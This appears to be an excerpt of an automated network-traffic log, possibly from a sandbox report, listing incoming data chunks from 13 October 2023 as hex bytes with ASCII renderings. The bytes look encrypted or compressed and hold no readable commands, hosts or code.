2023-10-13 13:21:13 UTC	1528	IN	Data Raw: 02 46 7e 3d 90 28 cb 34 38 cd 22 11 19 12 d0 f8 59 fd 1c 07 4d f1 e6 02 67 4c 5f a4 52 2a 68 65 fd 60 b1 2d fa d5 fa c6 e9 08 ea 55 51 8c 0f e4 97 0e 9e 3e 6d e2 9b 73 6b c2 14 ac 40 5e 5e d5 c9 29 85 e4 ec 65 66 bb 17 df 5f 0e 60 17 93 19 1e 09 c9 47 d9 d5 ee 4e b4 18 25 16 2d 00 38 4c 00 20 6b 3f 7b ff e0 7a bd 07 23 35 53 11 ea 94 51 0b 7f cf b7 cc fb e5 4b 3b d2 b6 4f 8c 1f 80 79 1b 7a 1a 1a 7a 75 a8 6b df 06 87 3c 30 ef 20 0d 9d 18 cf f6 1b 90 10 3f 1c 19 51 fd ae 99 3e 46 a8 b9 c8 cd f3 57 76 cb f0 03 27 a4 9e 4f 62 8a 38 76 a7 25 04 0e eb 52 62 0c 96 26 91 11 97 b0 51 f2 19 5d f0 96 cc 0c 07 ec cf 44 07 4c f2 47 7e bb 1c 9b d5 75 ec 0d 0e 13 18 1e 40 f3 37 48 14 4c fd a9 14 0e c1 ee 9e 82 7a 43 11 b2 1d 3a a0 64 68 e5 a5 c3 83 42 43 9f 0c 1a 18 17 Data Ascii: F~=(48"YMgL_R*he`-UQ>msk@^^)ef_`GN%-8L k?{z#5SQK;Oyzzuk<0 ?Q>FWv'Ob8v%Rb&Q]DLG~u@7HLzC:dhBC
2023-10-13 13:21:13 UTC	1544	IN	Data Raw: 98 d5 15 29 e1 56 fc 5d 9f 04 d2 e7 c1 39 60 aa d1 7d e5 3d 54 25 cf 31 d5 4b 24 7e 38 5a 9b c8 a6 f1 2c a3 41 d5 db 02 16 7a d9 a9 5b 4f 45 45 8f 04 72 36 ab 64 9c 02 7b 58 f0 52 2a d5 8d d1 5e 69 10 8a fe b3 18 7e c7 b9 6a 57 f4 62 99 d3 fc 55 22 6e 0d 64 d8 07 03 53 dd 1e 2f b4 5a 4c c4 cb 76 de c4 f0 2f d5 db 0f 21 8a 93 df 03 68 e5 28 d4 97 9f 22 84 d3 c5 f7 92 be 37 e3 5b b5 d2 a5 cd 9f f5 84 68 a8 9c 96 9c 4c 79 30 6a f3 6a 28 4b d9 db 5c 8f c0 4f ed bc e7 a7 c3 0a 41 2a 0f 6f 7f 44 54 00 e7 fc 4a e6 ca ff 75 a3 74 98 da 0a 4e c2 ed f3 d6 e3 8b 3d c7 d1 53 f5 a9 6d ff 29 60 96 c5 fd 6c 24 87 76 c5 cc fa 54 56 81 e8 82 16 7a 27 79 e5 bb ed b0 a3 c4 11 6f ce c2 2c 12 8f ab 6c 66 dc bd 24 12 4f 8e ce 61 86 57 b9 d1 ea 79 42 e1 0d 1d 8d 6e 29 51 7c 38 Data Ascii: )V]9`}=T%1K$~8Z,Az[OEEr6d{XR^i~jWbU"ndS/ZLv/!h("7[hLy0jj(K\OAoDTJutN=Sm)`l$vTVz'yo,lf$OaWyBn)Q\|8
2023-10-13 13:21:13 UTC	1560	IN	Data Raw: 5e 1e f2 f5 c7 ec fd 78 18 a1 a7 cf 9b 21 5e 50 c7 50 29 3b 89 4c ad d2 3e 0f 49 09 6b f4 1f ac c5 73 4c c6 fd df 1a 0e 6d d4 ba d7 f5 5d cc 03 b7 af dc 31 dd 36 b9 7c 7f 28 0d b8 1e 40 6a 49 b6 10 7f 16 3a fd 9a 7a c0 fc ea 54 08 2f cc 4b 38 09 71 88 62 1a fa ea 48 54 5f 04 43 9b f5 1e 8c 09 91 48 5d 5c 58 93 e4 84 84 7b 41 6c 33 1a 7e fd d9 4b a3 df ad ac 9c 0a 42 dd 67 d6 f9 78 d2 04 bd ed dc 46 0d 8f f7 62 a4 78 5d ca 19 bf 30 19 c7 d2 31 3f 3e c5 40 b7 54 9a 48 08 2d 8f ec 0f 24 c9 56 1b 0d f3 25 83 04 b0 ce 99 65 5c d7 bf 2e e2 c0 56 a0 c0 93 a4 f6 4f ec 6b 46 e3 8f af dc 62 94 a7 e2 84 ae ba f8 e7 72 ea 85 cc fc 53 73 f4 0a 68 73 d1 3a 26 88 63 5b 82 14 8c 37 d2 0b 58 4e 00 2e 34 29 7c c7 83 f3 e9 b4 39 3f 4e 9d 20 42 e5 4f 28 98 95 16 85 6c a7 a4 Data Ascii: ^x!^PP);L>IksLm]16\|(@jI:zT/K8qbHT_CH]\X{Al3~KBgxFbx]01?>@TH-$V%e\.VOkFbrSshs:&c[7XN.4)\|9?N BO(l
2023-10-13 13:21:13 UTC	1576	IN	Data Raw: 6c b0 20 c3 a0 45 eb 6e 8b ca 6e b1 6e a1 78 8a a3 ad 17 0b 19 c3 1e ef 24 f3 98 ee eb 96 82 d1 6a 78 65 b9 e3 04 58 2a f0 81 01 26 fe ef 12 53 1e f9 23 f7 b2 1a 98 42 89 f4 16 a6 c2 f0 0e 58 62 58 d1 f0 55 64 ab 94 5d b7 ef 70 01 a4 3a 2c bb 45 45 a0 84 54 b1 76 a0 64 7f 9f 9d 72 51 d9 9c e6 af 90 41 54 56 d6 07 ed 76 6e 19 90 14 52 55 cd 43 98 ba 73 74 06 4d b8 e1 f1 73 a3 62 b3 b6 2f f0 0b 0c b8 2d d5 e9 6e 28 9b 6c 0b 2f ed 6c a8 f3 a2 00 ba e9 02 db 95 9a 49 df ea 85 ef a1 92 8e 43 aa 30 04 49 db d2 29 9a 01 bd 5e 83 50 f7 55 98 d7 61 ce 39 f3 bf cd 2d 49 9b 75 c9 d0 a6 61 d9 b4 bc 03 55 32 15 93 16 4c 04 ff 1b 06 6b 8e 6a dc e9 b5 c5 bb 93 c7 ed 18 eb 1f e4 df 6a 66 dd 85 ed 8b 9e 95 3d 5a 93 70 be 17 70 74 0a 1f 36 3f 0b 72 7d a7 6d 6f 8c 6b 43 ce Data Ascii: l Ennnx$jxeX*&S#BXbXUd]p:,EETvdrQATVvnRUCstMsb/-n(l/lIC0I)^PUa9-IuaU2Lkjjf=Zppt6?r}mokC
2023-10-13 13:21:13 UTC	1592	IN	Data Raw: 41 32 8b 86 24 51 ab ee 00 5b a9 1d 18 ad f9 d7 df f2 ac 45 34 3d 45 0b 5b e7 8c 01 6d 48 03 27 3b aa d6 6c dc ff 29 ba 80 64 eb 41 94 f6 98 14 31 b2 66 ba 70 a2 16 b4 5d 5e 13 c4 05 55 b4 c4 33 e9 08 32 f7 e0 04 b4 d7 31 bd 8e 11 d1 2d e0 f0 bb 26 7b 9a 13 44 3b da 65 60 a9 cb bd 5e d6 87 41 87 0e 97 7d e7 9b 92 3e 18 64 fc 7d 69 55 98 4d 7b 97 7e 17 c3 b6 1e 06 5c c1 9b ce 80 d7 8e 8f a6 49 af 59 54 b6 16 05 cd b1 20 b6 e2 75 81 64 ec 5c c3 c6 81 1a 6e 3c db 34 7d 64 48 43 86 bd 3d 2c f9 eb b9 e4 14 7f fb 12 93 46 c8 46 de 8e 96 58 b8 c6 f3 54 ce ad a0 cd dc b9 33 60 6a fb af d5 cb 48 67 1f 1f 24 89 33 f2 7d a9 74 1e fd 8a 76 7f 2f 47 86 8b c4 82 af b2 04 96 ad b9 f0 7c 09 c6 53 79 97 57 15 fd a0 96 9b 0b 37 aa b7 84 90 ff 8a 19 bd a1 4f b7 a4 bd b1 70 Data Ascii: A2$Q[E4=E[mH';l)dA1fp]^U321-&{D;e`^A}>d}iUM{~\IYT ud\n<4}dHC=,FFXT3`jHg$3}tv/G\|SyW7Op
2023-10-13 13:21:13 UTC	1608	IN	Data Raw: b0 cc db ac 1d e5 57 11 b3 c6 0e 48 89 c3 4f ba 23 56 17 96 c6 32 89 6c ba 2e 6e bf 0a 78 57 47 86 95 4c 8e 7e e3 75 b7 11 69 65 cc 15 76 2c 88 30 e9 e4 b2 c3 fb ad 08 33 fc b8 d8 e3 a1 13 9b f8 75 ff 96 3b 13 76 16 06 46 14 81 7f 44 10 c8 0c 32 5d 45 9b cd 7b 81 79 dd bc 6f ec 18 5d 77 ea 84 85 e8 01 b7 43 ac cd aa 93 18 df b0 fe ff 9b 47 94 7e 5b 1a 17 29 4c 92 80 38 c9 00 a5 66 be d2 49 96 a1 3a a4 66 cd 78 06 65 e0 2f b9 a5 86 23 87 ef 92 01 1e 76 db 56 ec c0 f9 12 b6 c7 11 b5 6e e8 e3 37 cc 9d 44 fd 7c 96 59 63 48 13 4b 94 62 c3 cf 3f 2e f0 30 c3 1e 7b 7c 8b 5c ce 0c ed 1b 85 84 e9 83 28 74 2a 3e af 32 3e d0 50 08 15 b2 5d c6 f7 fd 1a 0a 1b 35 ac f6 9e d8 1e 9c 82 d5 a9 f7 e1 9a e8 a2 36 f2 c6 b4 7f 62 18 2b 1a 14 69 97 d0 3e 1c 17 7f 38 4b 88 7f 0b Data Ascii: WHO#V2l.nxWGL~uiev,03u;vFD2]E{yo]wCG~[)L8fI:fxe/#vVn7D\|YcHKb?.0{\|\(t*>2>P]56b+i>8K
2023-10-13 13:21:13 UTC	1624	IN	Data Raw: 75 bb 0b 52 e0 bc 03 77 26 80 f9 f7 64 4f 53 1d f9 a3 3e 5c 13 ad 04 2e 4b 12 86 2b d3 da 9d 1e f7 d6 a1 df 27 c0 72 be 64 43 65 fc 78 a4 3e 39 59 21 50 3e ab ed a3 c9 6e 7c f8 2f 39 39 d0 52 b8 3c 3e 37 a2 12 b3 6c e0 67 ad bb 0f 5d e1 a8 33 e4 41 32 3b ef 26 d5 58 93 f4 b0 99 94 d0 38 b1 75 4b 37 61 62 9e e2 4f d0 28 bb 9d 35 e7 e8 d0 37 79 d3 1e a0 b0 96 e3 a1 21 53 16 78 f1 e5 22 13 c2 7f 1c ed e4 1a 14 cd 85 bc 93 a1 48 6b 44 4d 5e 91 cf 42 c8 c7 5f 02 47 08 fe 7b c9 ea 5b 7b 99 55 56 dd 57 7c f2 ec af fa c5 fe 74 77 fb 03 d1 44 15 34 8b 14 30 1e 07 2c c8 6c 89 84 84 1a 39 44 ab 8f ab dc cd a6 17 6b 49 39 17 0c 1c be 6a 1a 49 15 54 15 10 00 f4 86 b4 1c 6b c0 26 1f af 12 1b 90 d3 db 74 ea da 97 5c 76 99 87 3a 2d 87 f7 d9 f1 5f 5c d5 10 21 be d4 b9 37 Data Ascii: uRw&dOS>\.K+'rdCex>9Y!P>n\|/99R<>7lg]3A2;&X8uK7abO(57y!Sx"HkDM^B_G{[{UVW\|twD40,l9DkI9jITk&t\v:-_\!7
2023-10-13 13:21:13 UTC	1640	IN	Data Raw: 49 d3 79 3d c4 c7 05 99 0b d1 6a 6a f4 44 2d 59 c0 2f 64 db cc 31 d1 9d 59 71 95 8f 58 e7 0d 5e 08 a8 45 da 69 55 1b e7 8a 17 1f a7 45 5c b3 d8 ab 3c c8 44 cc 91 32 0f 7e 9e 79 42 e2 3c 15 4e 9d d6 b2 ab a3 2a d7 69 e2 d4 c7 c4 d3 32 65 3f d5 28 bd d2 6d 4d 03 11 93 22 d0 aa 95 af 76 33 e9 b5 20 cf 60 94 ee 4d 2f b5 42 ee 1b 09 46 e7 b0 43 9a 3b 1a a3 0e 26 8a 49 1a fe 9f 87 99 6d 61 c7 8b 04 51 d9 d7 c9 87 fd 9c 02 72 cc 86 7d 45 05 4e ba 93 85 72 cf da 05 c3 1c 6f 6e f7 2f 8b ae 3f 60 a4 00 2d 04 36 ef 0a 0f 2e b8 a8 53 ed fc f0 94 c0 a1 af a6 4f 78 30 f7 98 7a bc db 65 9a a7 a5 6c 77 16 d4 2c 8b 97 81 3d a3 d2 81 79 3a 42 88 30 ee ee a6 72 dd ec 54 c6 5c 34 4d 99 34 32 b5 9c 31 86 ee ef 20 80 d3 c8 72 fa 86 57 84 17 31 26 e3 3a 1d aa 81 2a 67 e2 fc 47 Data Ascii: Iy=jjD-Y/d1YqX^EiUE\<D2~yB<Ni2e?(mM"v3 `M/BFC;&ImaQr}ENron/?`-6.SOx0zelw,=y:B0rT\4M421 rW1&:gG
2023-10-13 13:21:13 UTC	1656	IN	Data Raw: 6d 2c 86 9a 01 94 d4 49 17 33 88 00 ec 4a d8 c0 06 68 0e 1a 2b 3a 03 21 4c 8a a9 cb e6 02 3b d8 7f aa 1b a4 54 49 57 65 45 50 ee b7 55 53 4b cd 0b 63 67 21 f9 ed a3 c3 5b f1 05 f5 39 28 c2 ef bd 88 9d b2 58 5f 73 a3 4e 80 82 49 81 95 6e 32 e0 92 58 32 7f e1 c2 4f aa c1 4c 88 b5 04 7f 07 76 c8 0f 15 b9 4e 5d 3c 58 33 b5 43 43 17 62 65 2a 75 0d f6 54 31 28 39 8c 70 ce a5 58 dc 84 dc 92 1d 93 b6 d9 30 42 2d e5 91 12 45 d8 c5 d2 1a 17 d0 8d aa b3 a2 39 3f 27 03 46 11 af 02 de a2 8d 43 e0 ed ec 72 78 4e 87 97 1f c2 13 a7 37 40 d8 7a 66 86 ed 82 3c 1b 8c bf ed af 6b ea 98 1d d5 6a 83 ed 48 9b fc fa 80 b3 e6 ec 8f 56 91 48 5e 13 ae 46 fb 1b d6 c2 4e a1 65 db 9d dc b4 3f 46 00 de 17 d5 24 12 9c 0e 33 7a 59 db eb 93 17 74 ab 84 d1 a6 94 09 a4 03 7b c3 ac 9b 11 67 Data Ascii: m,I3Jh+:!L;TIWeEPUSKcg![9(X_sNIn2X2OLvN]<X3CCbe*uT1(9pX0B-E9?'FCrxN7@zf<kjHVH^FNe?F$3zYt{g
2023-10-13 13:21:13 UTC	1672	IN	Data Raw: e7 25 a8 e2 83 df 2f 3f bf 22 14 3c 02 b6 00 30 ba 2a 89 d9 9f f7 c8 49 a0 2c 36 55 35 58 81 d2 c1 9f 8a d9 82 26 65 7e 3b f3 f7 e5 d8 63 49 6f 32 20 44 10 6f 11 a4 a9 5a e8 85 4b 66 6b 8f d9 0a 37 8e 6f 94 62 e8 bb fe 62 4b 35 61 65 a4 d1 84 36 ac ac df 49 8a 8a f1 2e 9e 70 f6 88 c5 11 1a 6f af c3 e0 6e 67 52 5f cd 53 af b5 e9 10 a3 a1 c4 d9 a9 1e 91 ea fc 72 d7 49 ed 04 5b 66 3f f1 d9 42 26 6c 16 18 94 a1 04 49 a0 ae bc a4 f7 92 6f 22 92 36 d8 af c2 dc 84 a2 32 bb a2 35 44 88 b1 07 66 d9 82 72 d0 ed c6 f2 f5 b8 30 83 11 e2 30 0d 01 6e 91 91 da 18 fb b5 7c e4 ad e7 0a e1 8d 22 cf 99 8c fd 81 5e 16 54 3b e7 80 73 e9 11 21 ab ff 99 6c 60 ed e0 94 5f 14 da cc 60 ac 2e 96 0a 87 2b da 32 9b fe 1c a5 2d bd de 72 4d 93 4a 8c 60 4e 64 9c 6f 14 45 4c dc 2e 32 02 Data Ascii: %/?"<0*I,6U5X&e~;cIo2 DoZKfk7obbK5ae6I.pongR_SrI[f?B&lIo"625Dfr00n\|"^T;s!l`_`.+2-rMJ`NdoEL.2
2023-10-13 13:21:13 UTC	1688	IN	Data Raw: 06 01 2a 25 12 40 6f dd e9 62 a6 80 92 86 ae b9 e5 6d 5f 38 37 96 d8 b5 55 52 86 af 87 db 0d 17 6b c5 0e cb 2b 76 c8 87 76 2e 6d ee 46 cf 8c 7e 00 4b 94 6e 6c 1f d3 7f b9 37 85 8c a2 f1 78 36 4b 99 02 6d 03 54 de 6e 33 21 d4 f5 0f d6 15 c3 8e 0c 90 17 44 1a 99 0a 1c 67 b3 32 43 f1 4f fd 8d 61 a0 02 bc 7f 14 45 b4 ea 60 1b 25 8d 13 65 c4 13 d5 f9 3f 80 b4 57 48 2f e8 98 48 8b b8 1c 28 de 6f f4 a7 a7 8b 49 d2 70 fe 7e a2 df f5 a1 18 76 b8 93 e7 27 23 ce 64 22 d7 4e bf 82 6d e1 1c 27 55 d5 cd f2 76 95 3f 33 78 9b 11 b1 07 ef c5 63 87 80 10 cc 87 16 93 8d 74 99 49 7c 3d 5d df 0d 32 89 1f e8 28 2f 2c ad 5a 30 c7 40 35 14 3d 08 c2 72 16 35 9b 17 a3 d2 6f 5d 97 0b a1 1b 8c db 82 53 ca 1e d2 66 27 b3 0e de d1 50 b7 43 9f ed f5 75 fd f8 a5 bd 11 62 45 ec 88 64 62 Data Ascii: *%@obm_87URk+vv.mF~Knl7x6KmTn3!Dg2COaE`%e?WH/H(oIp~v'#d"Nm'Uv?3xctI\|=]2(/,Z0@5=r5o]Sf'PCubEdb
2023-10-13 13:21:13 UTC	1704	IN	Data Raw: 53 1a 7e 90 d8 a7 54 6c 4f e3 72 0c bb 99 cf 60 f6 7f 39 0f 0e 27 68 7c 36 6d dd f4 48 15 f6 3e 04 f7 6a cc 50 2b 77 c7 68 9a be d1 bb 51 f9 9c 62 83 b9 41 d4 b3 bd 3d ae d2 d8 6c 1a c6 d0 de f6 57 7d 93 d8 8e a2 24 39 57 7f d0 ec 03 9d 90 4c 57 d9 7a 4c 10 b1 e9 f6 55 88 22 bc 59 05 80 fc bf d9 dc 98 f7 25 ae ae 6b 3d f4 79 9d 5a f1 7f f2 c8 f1 ac 8f 96 5f 7e c9 08 6c 2a 27 5f 21 2d 0b 5b c5 7b 39 03 d4 de 22 fb f0 51 da 1b de 8d 3d f6 11 07 d5 a4 06 2f 2e ab b2 85 ee e6 14 b7 20 e1 25 55 7d bc a3 de 28 04 e7 e5 56 31 4b be 34 47 56 80 7f 4a e7 95 8c df 07 05 0d 4c 24 b0 88 eb 72 f2 f3 b3 5f 1d 30 7b bc 33 ba 08 22 16 cc 63 2c 94 5c 7e 64 47 be 6f 3f 7e a4 85 c1 21 03 5d 40 6a 4e 40 a8 a4 75 2c 8f d6 2f b9 93 fc c6 38 90 45 c0 7c 1f 34 07 ef f4 0a 16 cc Data Ascii: S~TlOr`9'h\|6mH>jP+whQbA=lW}$9WLWzLU"Y%k=yZ_~l*'_!-[{9"Q=/. %U}(V1K4GVJL$r_0{3"c,\~dGo?~!]@jN@u,/8E\|4
2023-10-13 13:21:13 UTC	1720	IN	Data Raw: 93 49 6d dd 10 96 c6 16 7f ba 46 88 8f ea 38 e0 93 d9 e0 a7 04 83 52 8c a5 6e f5 e2 d5 6e a9 2a 7a 64 af f4 aa b6 f1 c4 75 98 05 4d 83 b0 72 f0 7a 9c 41 60 6f 40 06 14 80 17 63 ce 6a 55 ce 4b 9b 0e 83 1c 4f 5b f0 69 f9 32 d4 5c b6 98 f8 62 8d 02 cf c4 24 9f 46 d9 3d b9 12 e8 d1 51 b6 be b3 38 cd 64 dc 37 7f 95 cd 01 9a e3 53 fa fe 8e a5 ff d9 0c a1 eb 31 eb eb 99 3a e5 74 4d 70 97 b8 ad cd fe df dc a8 f7 1e b8 89 41 06 d2 29 71 96 6c b5 c7 77 21 3c b2 c1 3b 37 7d cd e2 cf 12 da 68 42 13 08 24 7d 25 4a 87 24 41 a6 a8 bc 2a b5 06 b1 51 c0 0a a8 d8 56 95 f8 63 a7 ca 4e 35 b4 15 b9 10 cb 0a e0 fd 7f d8 60 ad 3a a0 a9 dd 92 a0 52 7a 43 cf 6a 35 68 18 7e 7f 75 79 b3 bb 85 02 54 87 d4 dd 40 79 5e 00 9c 57 02 84 20 a6 71 ee 73 5b c2 dc 94 fe 2b 72 2d 00 29 63 4f Data Ascii: ImF8RnnzduMrzA`o@cjUKO[i2\b$F=Q8d7S1:tMpA)qlw!<;7}hB$}%J$AQVcN5`:RzCj5h~uyT@y^W qs[+r-)cO
2023-10-13 13:21:13 UTC	1736	IN	Data Raw: 2b 41 c7 20 93 c1 3e f3 72 8f 9f d8 82 b8 0b 73 f6 5f b7 75 e5 7f 27 ec cb ca 15 2f 37 30 29 b6 52 d7 e7 13 3d b1 f5 5a 8e c3 b9 2f 99 ad 24 1e 8c 4f 59 3b 11 80 85 ef b9 be 48 7b 2d f2 96 32 2a 2a b9 2a ea 22 81 78 dd 2c ba 77 f7 6d 1f 31 6d 87 1b 80 74 0a 2c 83 5f 10 15 12 20 0d b7 8b e3 50 88 61 91 6b f9 59 f4 a6 cb 32 27 f9 29 bf 28 f8 82 0d af 06 d4 13 d2 04 ab 1e 18 7c 21 37 27 b4 f0 f3 9c 31 9f 74 a7 c9 61 00 e6 11 ef 03 98 2a a8 4f 5b e4 35 c0 92 29 29 44 c3 48 32 8f 43 10 86 ff d6 07 19 f7 fd 2a 79 36 70 51 2d dd d5 11 59 51 48 bd 27 72 89 08 25 ca f1 da d2 54 51 5e c0 40 be 81 2f 0a 3c 3e f2 01 cb 0c 6b 00 37 7c 2b eb 1c 7e 8a d9 f4 55 c0 e7 aa b2 16 12 b8 08 cb a8 a4 a6 78 6c 15 03 0a 80 0a f8 e7 4d c1 2b 70 5b 02 1e b5 be 00 21 c9 3b ed 5a a6 Data Ascii: +A >rs_u'/70)R=Z/$OY;H{-2**"x,wm1mt,_ PakY2')(\|!7'1taO[5))DH2C*y6pQ-YQH'r%TQ^@/<>k7\|+~UxlM+p[!;Z
2023-10-13 13:21:13 UTC	1752	IN	Data Raw: 3c f2 55 ad 64 e4 75 cd 9a 0c 37 10 61 c0 b7 9e 9c 50 b7 5e 74 fa 5b 6a df 64 d9 b6 0a 78 88 6b a0 03 18 af d5 5e a6 57 4b 8a 45 6e 4e f5 8f 2c a7 88 c0 ec 63 9b 40 25 ba a2 0a d9 1f 31 7f 97 e1 b5 f6 24 8a bd 81 7f 7e bd 12 e2 72 96 84 a6 6e ec 11 aa 3c 1f e4 08 9f d9 0e a1 ea 50 4e 2b 46 d2 96 60 81 c8 10 26 4d d8 67 15 36 ca 23 2e 09 5b 64 e2 3d 84 02 03 91 12 2e c0 5d cd b2 28 de ed 07 1b 8e a6 0d df be 7b c5 bb 1a bc 82 f9 24 75 1d 57 12 83 ad 17 5e 07 f9 35 6b b5 2b 3f 35 3f b6 bb bc 36 aa 8c 3c af cc b9 73 1f e8 f1 90 5b d7 a2 59 9a 19 b8 2d 5b 31 08 f0 1e b6 bd b6 69 05 32 ea 52 49 16 19 66 a7 db ae 04 dc 13 5e 7a 65 92 22 03 f6 ce 12 c4 a4 39 9e 90 9e 48 d4 38 78 1d 12 50 36 a4 2e 6b e4 3d 87 c7 81 49 99 34 6f 16 8f c9 54 6c f4 f6 fb 92 ce 22 6c Data Ascii: <Udu7aP^t[jdxk^WKEnN,c@%1$~rn<PN+F`&Mg6#.[d=.]({$uW^5k+?5?6<s[Y-[1i2RIf^ze"9H8xP6.k=I4oTl"l
2023-10-13 13:21:13 UTC	1768	IN	Data Raw: e2 a9 fc 15 6a 72 32 db 15 59 df a5 a5 ba 70 af c4 34 a3 83 2b f0 79 a7 7f d3 31 50 8a 08 da 84 34 5f 21 1d ff cd ce 97 a0 5c cd ea e4 c7 a8 c4 64 88 8f 8c c8 f1 f7 70 b1 d7 6a 31 4a 85 27 37 9f 31 81 41 ec ea 52 87 45 05 e3 24 dd 5e 90 f8 e5 6f 3b b2 a7 97 00 0b 56 a9 7f f7 3f 59 5e 78 3e 1a 85 ce fc 98 ea 7f 54 d5 b9 2b fb d7 28 54 f7 8e 3e 56 1f b5 b8 76 94 86 ec 33 80 95 5c 8a 3b 60 a7 75 a9 96 4b 48 85 bf ca 84 49 b5 89 cb 6c 9a 93 ae cb 36 c2 a8 c4 f2 ad bb f4 84 41 01 06 63 e5 8a ed 18 ea 43 ff b8 a7 bb 3f 83 f6 ca f6 a0 ec 82 c5 2e 43 f8 f1 44 ef 45 47 e3 61 be 9f 8f b1 d2 1a 65 4c 13 dd 54 68 fc 12 a7 60 ac e1 f3 fa c8 29 75 61 13 9b fa 10 f3 21 82 20 e3 f0 b8 65 77 b4 17 0e 02 c2 f9 8b 26 7f 1d 7e d5 06 ee 0f b4 12 35 e3 26 bd 9b 59 48 88 f1 d8 Data Ascii: jr2Yp4+y1P4_!\dpj1J'71ARE$^o;V?Y^x>T+(T>Vv3\;`uKHIl6AcC?.CDEGaeLTh`)ua! ew&~5&YH
2023-10-13 13:21:13 UTC	1784	IN	Data Raw: 50 6f 7d fd 28 45 b6 11 23 16 c0 e1 b6 52 f3 be 70 f2 f8 9e e9 e1 6f 6f 5e ec 49 04 f0 34 78 dc b8 02 70 78 65 6b 78 08 d0 b0 cd b1 b9 19 78 6e 1d 35 6f 54 2c 7b b7 05 21 ee 22 3a dc 2e c9 25 d0 35 ec 06 70 60 ac f1 80 e8 22 f3 61 de b3 b5 65 4d 41 2b 4e 76 79 13 7d dc 44 0a 8d 59 70 05 90 7b 78 20 a1 df e4 ff 63 1c a1 43 1d e9 57 04 46 c4 84 3a 1a f1 56 2a a9 79 bd 93 fe 83 29 97 e7 cc 42 f8 4e 13 4b 34 04 b9 3f 20 62 20 be 4e 19 e9 a3 7d a2 0d da 67 9a d1 a8 d0 57 8b ec 64 fd 07 6f b7 cb 60 a6 ec 33 61 1b c8 b9 40 55 a5 d3 61 60 ca 90 32 2e 61 46 f7 b6 46 c2 f5 a5 7c 72 11 84 a7 a2 ce 37 6e 6d 84 c5 30 61 a7 1f 71 5a 6c 80 bb 79 5f 38 81 57 74 c5 73 c7 a5 59 b9 b5 da 01 7f 3c 09 76 30 05 9f 27 96 fd 4f 2b 0c 11 99 db b0 9a 66 6f fb 1e ac 1a ef 8d b4 bb Data Ascii: Po}(E#Rpoo^I4xpxekxxn5oT,{!":.%5p`"aeMA+Nvy}DYp{x cCWF:V*y)BNK4? b N}gWdo`3a@Ua`2.aFF\|r7nm0aqZly_8WtsY<v0'O+fo
2023-10-13 13:21:13 UTC	1800	IN	Data Raw: a2 a3 07 5d 4a 96 7e 45 c1 bd 54 f4 af f7 5f c2 01 68 fa cf 41 b9 ab ce 99 e2 3c ec 9e c9 8d ad 2d f8 00 b6 d8 0a 86 dd 2c b2 62 9e 21 87 6e 7c 34 f4 a1 c4 9f 80 52 02 7f aa 1e 1b 4d a3 00 f9 5b 2a 42 ae 3a 63 35 1d d3 99 94 2a 08 47 b0 07 49 37 50 66 3a 29 97 62 f3 82 82 76 b8 1e 1b e3 fa f5 0c e3 80 06 26 82 8b 7f 7a 82 c9 0a 7b cc 6d de be e1 38 93 44 c6 0f 6d 8d 04 b0 68 1a a1 4d 24 a0 5e ec 92 fb 51 da 1a 14 b5 bb 39 48 29 e2 a7 63 64 5b 76 86 24 e6 5d 48 e3 13 98 f8 69 67 72 db 21 3c bf 67 3e ea e4 e6 dc c5 e7 f8 6f 17 0d d8 87 91 72 d8 5d 78 69 54 56 b9 4c 5e 4e 74 dc d3 4f 5a 8e 32 b9 dd b5 29 aa 0e 04 66 91 72 d0 03 6f c3 bc b3 19 e4 f7 12 b7 f1 c3 35 37 58 d3 23 d9 73 70 ac 98 7e ce 7f 7d 7e 0d e3 23 f3 4c f6 bf 8e 5a f1 2a c8 60 d0 92 c0 32 cd Data Ascii: ]J~ET_hA<-,b!n\|4RM[B:c5GI7Pf:)bv&z{m8DmhM$^Q9H)cd[v$]Higr!<g>or]xiTVL^NtOZ2)fro57X#sp~}~#LZ*`2
2023-10-13 13:21:13 UTC	1816	IN	Data Raw: bf c3 c4 78 3b a1 fb 65 dc 49 0e 14 13 10 85 07 3f ca 0d 9c 64 85 7b b0 7d 48 10 4a 8a e8 75 aa 17 71 9a 5e 9d 7f 0e 59 0b 46 d4 6e 08 13 65 da e5 91 c8 e5 28 2c d7 ab f8 cc 21 36 da 13 62 33 fb 3d 1d ce 26 4c bd 09 63 3f c4 ae 82 06 ad 4a 66 54 ca 77 04 19 a2 77 75 2e 19 00 54 3d 42 ba 89 88 74 f9 b2 cc 99 18 ba 33 9a 2a c2 03 51 dd 52 97 e0 c3 7d dc 69 ec ac ff f1 fc 78 10 fe 06 ee 86 73 4f a6 4e 22 71 22 63 81 62 ff 94 41 54 d1 a5 e4 e9 31 b3 b8 4e ac 50 24 10 cc e8 b0 4f 32 7c 11 79 17 1d c0 04 4f df fa 9e c7 7d d1 df b2 c7 ba c6 9c 32 3d 45 07 6b 8f 91 34 69 12 31 3f 36 72 55 fe c9 64 99 fb 3f 89 8c 0a 5a 72 ac ee fb 1f 27 fc 2e 27 89 88 3d 12 ad 74 a5 bd 1c 82 d4 ae b0 4f ee 70 fa dd d1 e1 4f 4e a5 e4 66 fd 17 64 c3 04 7a ef 91 5e 69 06 02 f1 ee aa Data Ascii: x;eI?d{}HJuq^YFne(,!6b3=&Lc?JfTwwu.T=Bt3*QR}ixsON"q"cbAT1NP$O2\|yO}2=Ek4i1?6rUd?Zr'.'=tOpONfdz^i
2023-10-13 13:21:13 UTC	1832	IN	Data Raw: eb 09 b5 17 b5 64 ba 74 b0 69 1c 8f 16 6a 3b fe 5a 62 ea a5 41 9b 26 5c 60 61 35 ea 66 81 b8 65 26 f8 4e 23 8b a5 d8 37 ca b1 e2 2a a3 03 4e c1 d4 19 e9 19 f5 f7 0c 15 2b 82 cb 76 b3 b2 bb 26 24 e8 2c 44 3f 7d 54 28 c4 bd 56 1a 02 b2 1d 77 ac e4 b1 42 f8 1a e5 34 c6 7e ee b6 7d 77 4b 01 49 7e 3b 1a 85 67 e2 12 69 c2 35 b3 60 36 9c e2 51 63 72 05 00 2b 80 f4 35 ec ff cc fc 39 6a 1a ac 9a 5a af 06 24 1a 22 ce a3 f3 79 d3 96 05 3a 15 96 e8 81 bc 65 fe 72 b0 35 90 d4 a8 f3 02 8d b5 e3 5e ca bb 49 60 5c 81 b9 19 30 cb b7 ba b6 5f 32 f7 6c 3b 54 da b2 16 80 ff 9d 34 48 6c b9 bd 33 6c 68 12 f0 c9 75 2e 5f 02 ef 6f 30 09 68 e9 97 6c 07 d3 e0 26 b4 f3 43 b1 48 b8 fe f9 a3 47 fb 1e 90 88 07 41 51 d0 e6 49 a2 ae 7f 0a 9f 46 89 86 33 82 b0 b5 1c 02 2b 2c d9 f9 58 1f Data Ascii: 